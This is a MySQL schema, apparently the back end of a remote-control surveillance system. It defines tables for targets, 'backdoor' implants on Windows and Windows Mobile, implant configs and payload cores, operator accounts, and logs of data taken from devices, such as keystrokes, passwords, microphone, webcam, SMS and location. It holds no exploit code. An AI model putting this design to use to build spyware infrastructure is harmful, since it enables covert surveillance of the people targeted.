-- --------
--
-- DATABASE `rcs`
--
-- --------

DROP DATABASE IF EXISTS `rcs`;
CREATE DATABASE `rcs` DEFAULT CHARACTER SET utf8 COLLATE utf8_unicode_ci;
USE `rcs`;



-- --------
--
-- TABLE `activity`
--
-- --------

CREATE TABLE `activity` (
   `activity_id`   int(11)          NOT NULL auto_increment,
   `activity`      varchar(255)     NOT NULL,
   `desc`          varchar(255)     NOT NULL,
   `contact`       varchar(255)     NOT NULL,
   `status`        enum('OPEN',
                        'CLOSED')   NOT NULL,
   PRIMARY KEY (`activity_id`),
   UNIQUE KEY (`activity`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `activity_group`
--
-- --------

CREATE TABLE `activity_group` (
   `activity_id`   int(11)   NOT NULL,
   `group_id`      int(11)   NOT NULL,
   PRIMARY KEY (`activity_id`, `group_id`),
   KEY (`group_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `backdoor`
--
-- --------

CREATE TABLE `backdoor` (
   `backdoor_id`   int(11)             NOT NULL auto_increment,
   `backdoor`      varchar(255)        NOT NULL,
   `build`         varchar(255)        NOT NULL,
   `instance`      varchar(255)        NOT NULL,
   `desc`          varchar(255)        NOT NULL,
   `key`           varchar(255)        NOT NULL,
   `type`          enum('WIN32',
                        'WINMOBILE')   NOT NULL,
   `version`       int(11)             NOT NULL,
   `deleted`       int(11)             NOT NULL,
   `target_id`     int(11)             NOT NULL,
   PRIMARY KEY (`backdoor_id`),
   UNIQUE KEY (`backdoor`),
   UNIQUE KEY (`build`, `instance`),
   KEY (`target_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `blotter`
--
-- --------

CREATE TABLE `blotter` (
  `blotter_id`    int(11)        NOT NULL auto_increment,
  `blotter`       varchar(255)   NOT NULL,
  `desc`          varchar(255)   NOT NULL,
  `activity_id`   int(11)        NOT NULL,
  PRIMARY KEY (`blotter_id`),
  UNIQUE KEY (`blotter`),
  KEY (`activity_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `blotter_log`
--
-- --------

CREATE TABLE `blotter_log` (
  `blotter_id`   int(11)   NOT NULL,
  `log_id`       int(11)   NOT NULL,
  PRIMARY KEY (`blotter_id`, `log_id`),
  KEY (`log_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `cert`
--
-- --------

CREATE TABLE `cert` (
   `cn`     varchar(255)   NOT NULL,
   `cert`   longblob       NOT NULL,
   `key`    longblob       NOT NULL,
   UNIQUE KEY (`cn`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `config`
--
-- --------

CREATE TABLE `config` (
   `config_id`     int(11)    NOT NULL auto_increment,
   `backdoor_id`   int(11)    NOT NULL,
   `sent`          datetime   default NULL,
   `obsolete`      int(11)    NOT NULL,
   `content`       longblob   NOT NULL,
   PRIMARY KEY (`config_id`),
   KEY (`backdoor_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `core`
--
-- --------

CREATE TABLE `core` (
   `name`      varchar(255)            NOT NULL,
   `type`      enum('WIN32_X86',
                    'WINMOBILE_ARM')   NOT NULL,
   `version`   int(11)                 NOT NULL,
   `content`   longblob                NOT NULL,
   UNIQUE KEY (`name`, `type`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `download`
--
-- --------

CREATE TABLE `download` (
   `download_id`   int(11)        NOT NULL auto_increment,
   `backdoor_id`   int(11)        NOT NULL,
   `filename`      varchar(511)   NOT NULL,
   PRIMARY KEY (`download_id`),
   KEY (`backdoor_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `group`
--
-- --------

CREATE TABLE `group` (
   `group_id`   int(11)        NOT NULL auto_increment,
   `group`      varchar(255)   NOT NULL,
   `desc`       varchar(255)   NOT NULL,
   PRIMARY KEY (`group_id`),
   UNIQUE KEY (`group`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `group_user`
--
-- --------

CREATE TABLE `group_user` (
   `group_id`   int(11)   NOT NULL,
   `user_id`    int(11)   NOT NULL,
   PRIMARY KEY (`group_id`, `user_id`),
   KEY (`user_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `log`
--
-- --------

CREATE TABLE `log` (
   `log_id`        int(11)             NOT NULL auto_increment,
   `tag`           int(11)             NOT NULL,
   `type`          enum('ADDRESSBOOK',
                        'CALENDAR',
                        'CALLLIST',
                        'CHAT',
                        'CLIPBOARD',
                        'DEVICE',
                        'DOWNLOAD',
                        'FILECAP',
                        'FILEOPEN',
                        'KEYLOG',
                        'LOCATION',
                        'MAIL',
                        'MIC',
                        'MMS',
                        'PASSWORD',
                        'PRINT',
                        'SMS',
                        'SNAPSHOT',
                        'UPLOAD',
                        'URL',
                        'VOIP',
                        'WEBCAM')      NOT NULL,
   `flags`         int(11)             NOT NULL,
   `backdoor_id`   int(11)             NOT NULL,
   `remoteip`      varchar(255)        NOT NULL,
   `remotehost`    varchar(255)        NOT NULL,
   `remoteuser`    varchar(255)        NOT NULL,
   `received`      datetime            NOT NULL,
   `acquired`      datetime            NOT NULL,
   `varchar1`      varchar(511)        NOT NULL,
   `varchar2`      varchar(511)        NOT NULL,
   `varchar3`      varchar(511)        NOT NULL,
   `varchar4`      varchar(511)        NOT NULL,
   `int1`          int(11)             NOT NULL,
   `int2`          int(11)             NOT NULL,
   `int3`          int(11)             NOT NULL,
   `longtext1`     longtext            NOT NULL,
   `longblob1`     longblob            NOT NULL,
   PRIMARY KEY (`log_id`),
   KEY (`backdoor_id`),
   KEY (`tag`),
   KEY (`type`),
   KEY (`acquired`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `note`
--
-- --------

CREATE TABLE `monitor` (
   `monitor_id`   int(11)        NOT NULL auto_increment,
   `monitor`      varchar(255)   NOT NULL,
   `remoteip`     varchar(255)   NOT NULL,
   `timestamp`    datetime       NOT NULL,
   `status`       enum('OK',
                       'KO')     NOT NULL,
   `desc`         varchar(255)   NOT NULL,
   `disk`         int(11)        NOT NULL,
   `cputotal`     int(11)        NOT NULL,
   `cpuprocess`   int(11)        NOT NULL,
   PRIMARY KEY (`monitor_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `note`
--
-- --------

CREATE TABLE `note` (
   `note_id`     int(11)    NOT NULL auto_increment,
   `timestamp`   datetime   NOT NULL,
   `content`     longtext   NOT NULL,
   `user_id`     int(11)    default NULL,
   `log_id`      int(11)    NOT NULL,
   PRIMARY KEY (`note_id`),
   KEY (`user_id`),
   KEY (`log_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `session`
--
-- --------

CREATE TABLE `session` (
   `timestamp`    datetime       NOT NULL,
   `session`      varchar(255)   NOT NULL,
   `remoteip`     varchar(255)   NOT NULL,
   `user_id`      int(11)        NOT NULL,
   UNIQUE KEY  (`user_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `sign`
--
-- --------

CREATE TABLE `sign` (
   `sign`   varchar(255)   NOT NULL
) ENGINE=InnoDB;

-- --------
--
-- TABLE `stat`
--
-- --------

CREATE TABLE `stat` (
   `backdoor_id`       int(11)        NOT NULL,
   `remoteip`          varchar(255)   NOT NULL,
   `remotehost`        varchar(255)   NOT NULL,
   `remoteuser`        varchar(255)   NOT NULL,
   `received`          datetime       NOT NULL,
   `addressbook`       int(11)        NOT NULL,
   `addressbook_new`   int(11)        NOT NULL,
   `calendar`          int(11)        NOT NULL,
   `calendar_new`      int(11)        NOT NULL,
   `calllist`          int(11)        NOT NULL,
   `calllist_new`      int(11)        NOT NULL,
   `chat`              int(11)        NOT NULL,
   `chat_new`          int(11)        NOT NULL,
   `clipboard`         int(11)        NOT NULL,
   `clipboard_new`     int(11)        NOT NULL,
   `device`            int(11)        NOT NULL,
   `device_new`        int(11)        NOT NULL,
   `download`          int(11)        NOT NULL,
   `download_new`      int(11)        NOT NULL,
   `filecap`           int(11)        NOT NULL,
   `filecap_new`       int(11)        NOT NULL,
   `fileopen`          int(11)        NOT NULL,
   `fileopen_new`      int(11)        NOT NULL,
   `keylog`            int(11)        NOT NULL,
   `keylog_new`        int(11)        NOT NULL,
   `location`          int(11)        NOT NULL,
   `location_new`      int(11)        NOT NULL,
   `mail`              int(11)        NOT NULL,
   `mail_new`          int(11)        NOT NULL,
   `mic`               int(11)        NOT NULL,
   `mic_new`           int(11)        NOT NULL,
   `mms`               int(11)        NOT NULL,
   `mms_new`           int(11)        NOT NULL,
   `password`          int(11)        NOT NULL,
   `password_new`      int(11)        NOT NULL,
   `print`             int(11)        NOT NULL,
   `print_new`         int(11)        NOT NULL,
   `sms`               int(11)        NOT NULL,
   `sms_new`           int(11)        NOT NULL,
   `snapshot`          int(11)        NOT NULL,
   `snapshot_new`      int(11)        NOT NULL,
   `upload`            int(11)        NOT NULL,
   `upload_new`        int(11)        NOT NULL,
   `url`               int(11)        NOT NULL,
   `url_new`           int(11)        NOT NULL,
   `voip`              int(11)        NOT NULL,
   `voip_new`          int(11)        NOT NULL,
   `webcam`            int(11)        NOT NULL,
   `webcam_new`        int(11)        NOT NULL,
   PRIMARY KEY (`backdoor_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `target`
--
-- --------

CREATE TABLE `target` (
   `target_id`     int(11)        NOT NULL auto_increment,
   `target`        varchar(255)   NOT NULL,
   `desc`          varchar(255)   NOT NULL,
   `activity_id`   int(11)        NOT NULL,
   PRIMARY KEY (`target_id`),
   UNIQUE KEY (`target`),
   KEY (`activity_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `trace`
--
-- --------

CREATE TABLE `trace` (
   `trace_id`      int(11)        NOT NULL auto_increment,
   `timestamp`     datetime       NOT NULL,
   `user`          varchar(255)   NOT NULL,
   `action`        varchar(255)   NOT NULL,
   `desc`          longtext       NOT NULL,
   `user_id`       int(11)        NOT NULL,
   `group_id`      int(11)        NOT NULL,
   `activity_id`   int(11)        NOT NULL,
   `target_id`     int(11)        NOT NULL,
   `backdoor_id`   int(11)        NOT NULL,
   PRIMARY KEY (`trace_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `upload`
--
-- --------

CREATE TABLE `upload` (
   `upload_id`     int(11)        NOT NULL auto_increment,
   `backdoor_id`   int(11)        NOT NULL,
   `filename`      varchar(511)   NOT NULL,
   `content`       longblob       NOT NULL,
   PRIMARY KEY (`upload_id`),
   KEY (`backdoor_id`)
) ENGINE=InnoDB;

-- --------
--
-- TABLE `user`
--
-- --------

CREATE TABLE `user` (
   `user_id`   int(11)        NOT NULL auto_increment,
   `user`      varchar(255)   NOT NULL,
   `desc`      varchar(255)   NOT NULL,
   `pass`      char(40)       NOT NULL,
   `level`     int(11)        NOT NULL,
   PRIMARY KEY (`user_id`),
   UNIQUE KEY (`user`)
) ENGINE=InnoDB;



-- --------
--
-- CONSTRAINT `activity_group`
--
-- --------

ALTER TABLE `activity_group`
   ADD FOREIGN KEY (`activity_id`) REFERENCES `activity` (`activity_id`) ON DELETE CASCADE ON UPDATE CASCADE,
   ADD FOREIGN KEY (`group_id`) REFERENCES `group` (`group_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `backdoor`
--
-- --------

ALTER TABLE `backdoor`
   ADD FOREIGN KEY (`target_id`) REFERENCES `target` (`target_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `blotter`
--
-- --------

ALTER TABLE `blotter`
   ADD FOREIGN KEY (`activity_id`) REFERENCES `activity` (`activity_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `blotter_log`
--
-- --------

ALTER TABLE `blotter_log`
   ADD FOREIGN KEY (`blotter_id`) REFERENCES `blotter` (`blotter_id`) ON DELETE CASCADE ON UPDATE CASCADE,
   ADD FOREIGN KEY (`log_id`) REFERENCES `log` (`log_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `config`
--
-- --------

ALTER TABLE `config`
   ADD FOREIGN KEY (`backdoor_id`) REFERENCES `backdoor` (`backdoor_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `download`
--
-- --------

ALTER TABLE `download`
   ADD FOREIGN KEY (`backdoor_id`) REFERENCES `backdoor` (`backdoor_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `group_user`
--
-- --------

ALTER TABLE `group_user`
   ADD FOREIGN KEY (`group_id`) REFERENCES `group` (`group_id`) ON DELETE CASCADE ON UPDATE CASCADE,
   ADD FOREIGN KEY (`user_id`) REFERENCES `user` (`user_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `log`
--
-- --------

ALTER TABLE `log`
   ADD FOREIGN KEY (`backdoor_id`) REFERENCES `backdoor` (`backdoor_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `note`
--
-- --------

ALTER TABLE `note`
   ADD FOREIGN KEY (`user_id`) REFERENCES `user` (`user_id`) ON DELETE CASCADE ON UPDATE CASCADE,
   ADD FOREIGN KEY (`log_id`) REFERENCES `log` (`log_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `session`
--
-- --------

ALTER TABLE `session`
  ADD FOREIGN KEY (`user_id`) REFERENCES `user` (`user_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `stat`
--
-- --------

ALTER TABLE `stat`
  ADD FOREIGN KEY (`backdoor_id`) REFERENCES `backdoor` (`backdoor_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `target`
--
-- --------

ALTER TABLE `target`
   ADD FOREIGN KEY (`activity_id`) REFERENCES `activity` (`activity_id`) ON DELETE CASCADE ON UPDATE CASCADE;

-- --------
--
-- CONSTRAINT `upload`
--
-- --------

ALTER TABLE `upload`
   ADD FOREIGN KEY (`backdoor_id`) REFERENCES `backdoor` (`backdoor_id`) ON DELETE CASCADE ON UPDATE CASCADE;
